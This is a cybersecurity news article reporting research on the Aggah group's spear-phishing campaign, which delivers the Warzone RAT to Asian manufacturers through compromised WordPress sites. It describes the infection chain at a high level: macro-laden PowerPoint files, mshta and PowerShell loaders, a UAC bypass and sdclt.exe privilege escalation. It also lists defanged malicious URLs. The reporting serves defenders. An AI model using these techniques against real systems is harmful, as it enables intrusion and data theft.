Contact Us:

670 Lafayette Ave, Brooklyn,
NY 11216

+1 800 966 4564
+1 800 9667 4558

Newsletter
Join thousands of people who receive the latest breaking cybersecurity news every day.
The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.
The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.
Share this article:
The Pakistan-linked threat group’s campaign uses compromised WordPress sites to deliver the Warzone RAT to manufacturing companies in Taiwan and South Korea.
Threat actors are using compromised WordPress websites to target manufacturers across Asia with a new spear-phishing campaign that delivers the Warzone RAT, a commodity infostealer available widely for purchase on criminal forums, researchers have found.
The threat group Aggah, believed to be affiliated with Pakistan and first identified in March 2019, is delivering the RAT in a campaign aimed at spreading malware to manufacturing companies in Taiwan and South Korea, according to new research from threat detection and response security firm Anomali.
The campaign, which began in early July, uses spoofed email addresses appearing to originate with legitimate customers of the manufacturers, signaling that it was the work of Aggah, researchers noted.
Infosec Insiders Newsletter
“Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah,” Tara Gould and Rory Gould from Anomali Threat Research wrote in a report on the campaign published Thursday.
Researchers from Palo Alto Network’s Unit 42 first discovered Aggah in March 2019 in a campaign targeting entities in the United Arab Emirates that later was identified as a global phishing campaign designed to deliver RevengeRAT, researchers said.
The group, which typically aims to steal data from targets, was first thought to be associated with Gorgon Group: a Pakistani group known for targeting Western governments. This association has not been proven, but researchers tend to agree that the Urdu-speaking group originated in Pakistan, according to Anomali.
Among the targets of Aggah’s latest campaign were Fon-star International Technology, a Taiwan-based manufacturing company; FomoTech, a Taiwanese engineering company; and Hyundai Electric, a Korean power company.
Threat actors often target global manufacturers and other suppliers not only to target them, but also as a way to infiltrate some of their more high-profile customers. An example of this was seen in April when the now-defunct REvil gang successfully deployed ransomware against Quanta, a Taiwanese supplier of Apple Computer, just ahead of a big Apple product launch event.
REvil stole files from Quanta that included blueprints for some of Apple’s new products. The operators threatened to release more and to spill the beans on new products in order to pressure the company to pay up ahead of Apple’s Spring Loaded event.
The latest Aggah spear-phishing campaign begins with a custom email masquerading as “FoodHub.co.uk,” an online food delivery service based in the United Kingdom, researchers said.
The email body includes order and shipping information as well as an attached PowerPoint file named “Purchase order 4500061977,pdf.ppam” that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html, researchers explained.
“Hoteloscar.in is the legitimate website for a hotel in India that has been compromised to host malicious scripts,” they said. “Throughout this campaign, we observed legitimate websites being used to host the malicious scripts, most of which appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.”
The JavaScript uses anti-debugging techniques such as setInterval to detect the use of a debugger based on the execution time, researchers noted. This sends setInterval into an infinite loop if a debugger is detected. After the debugging checks, the script returned http://dlsc.af/wp-admin/buy/5[.]html, another compromised website for a food distributor based in Afghanistan.
Eventually, the Javascript uses PowerShell to load hex-encoded payloads, with the ultimate payload being the Warzone RAT, a C++-based malware available for purchase on the dark web, researchers said.
“Warzone is a commodity malware, with cracked versions hosted on GitHub,” they wrote. “The RAT reuses code from the Ave Maria stealer.” Capabilities of the Warzone RAT include privilege escalation, keylogging; remote shell, downloading and executing files, file manager, and persistence on the network, researchers noted.
“To bypass User Account Control (UAC), the Windows Defender path was added to a PowerShell command to exclude it,” they explained. “Privilege escalation in Warzone was carried out using sdclt.exe, a Windows backup utility in Windows 10.”
The Anomali team noted a number of tactics used in the campaign that are evidence of Aggah’s handiwork. These include the use of malicious documents and malicious PowerPoint files containing macros; obfuscated payloads in a PowerShell file, typically hex-encoded; use of scripts embedded in websites; themes of order and payment information; and the aforementioned use of spoofed B2B email addresses within the target industry.
Threatpost Webinar Series Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.
Share this article:
In a display of 2FA’s fallibility, unauthorized transactions approved without users’ authentication bled 483 accounts of funds.
Cisco issued a critical fix for a flaw in its Cisco RCM for Cisco StarOS Software that could give attackers RCE on the application with root-level privileges.
UPDATE: SolarWinds has fixed a Serv-U bug discovered when attackers used the Log4j flaw to try to log in to the file-sharing software.

This site uses Akismet to reduce spam. Learn how your comment data is processed.
Join thousands of people who receive the latest breaking cybersecurity news every day.
1.8M+ attacks, against half of all corporate networks, are attempting to exploit #Log4Shell, including with a new r… https://t.co/dDky1faadm
1 month ago
Get the latest breaking news delivered daily to your inbox.
The First Stop For Security News
Infosec Insider content is written by a trusted community of Threatpost cybersecurity subject matter experts. Each contribution has a goal of bringing a unique voice to important cybersecurity topics. Content strives to be of the highest quality, objective and non-commercial.
Sponsored Content is paid for by an advertiser. Sponsored content is written and edited by members of our sponsor community. This content creates an opportunity for a sponsor to provide insight and commentary from their point-of-view directly to the Threatpost audience. The Threatpost editorial team does not participate in the writing or editing of Sponsored Content.

source

Leave a comment

Your email address will not be published.